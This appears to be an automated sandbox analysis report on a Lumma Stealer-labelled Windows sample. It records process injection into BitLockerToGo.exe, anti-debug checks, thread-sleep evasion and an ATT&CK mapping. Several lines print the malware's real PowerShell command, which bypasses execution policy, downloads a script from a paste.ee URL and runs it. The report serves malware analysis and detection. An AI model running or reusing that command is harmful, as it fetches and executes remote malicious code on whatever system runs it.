Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: EwKKdCrEDu.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: EwKKdCrEDu.exe

Static file information: File size 16803840 > 1048576

Source: EwKKdCrEDu.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x5f9400
Source: EwKKdCrEDu.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x952800

Source: EwKKdCrEDu.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1691529805.0000000006BF9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdb source: EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.1691225462.0000000006B7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\Desktop\projects\loader\Release\Loader.pdb source: EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001DE0000.00000004.00001000.00020000.00000000.sdmp, EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001EF6000.00000004.00001000.00020000.00000000.sdmp, EwKKdCrEDu.exe, 00000000.00000002.1670983008.0000000001D34000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmp
Source:	Binary string: ion.pdb source: powershell.exe, 00000004.00000002.1691529805.0000000006C51000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: EwKKdCrEDu.exe, 00000000.00000002.1671695054.0000000001E7E000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"			Jump to behavior

Source: EwKKdCrEDu.exe

Static PE information: section name: .symtab

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_006F5751 push ecx; ret

2_2_006F5764

Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5491			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2390			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5396	Thread sleep count: 5491 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 60	Thread sleep count: 2390 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 344	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5684	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5972	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_006EC481 FindFirstFileExW,

2_2_006EC481

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: EwKKdCrEDu.exe, 00000000.00000002.1668214597.000000000169C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
Source: powershell.exe, 00000004.00000002.1691529805.0000000006C30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000004.00000002.1691299710.0000000006B9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW#

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_006E85EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_006E85EE

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_006EE5B2 GetProcessHeap,

2_2_006EE5B2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_006E2076 SetUnhandledExceptionFilter,	2_2_006E2076
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_006E85EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_006E85EE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_006E2185 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_006E2185
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_006E1F1A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_006E1F1A

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_6692.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6692, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\EwKKdCrEDu.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6E0000 protect: page execute and read and write

Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\EwKKdCrEDu.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6E0000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 5AA008	Jump to behavior
Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6E0000	Jump to behavior
Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6E1000	Jump to behavior
Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6F6000	Jump to behavior
Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6FE000	Jump to behavior
Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 700000	Jump to behavior
Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 701000	Jump to behavior

Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"			Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"			Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass "invoke-command -scriptblock ( [scriptblock]::create( ( invoke-webrequest -usebasicparsing -uri "https://paste.ee/d/7bwjv" ) ) )"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass "invoke-command -scriptblock ( [scriptblock]::create( ( invoke-webrequest -usebasicparsing -uri "https://paste.ee/d/7bwjv" ) ) )"			Jump to behavior

Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Queries volume information: C:\Users\user\Desktop\EwKKdCrEDu.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EwKKdCrEDu.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_006E1E07 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

2_2_006E1E07

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Command and Scripting Interpreter	1 DLL Side-Loading	311 Process Injection	21 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	311 Process Injection	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	12 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
EwKKdCrEDu.exe	21%	ReversingLabs	Win32.Trojan.LummaStealer

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
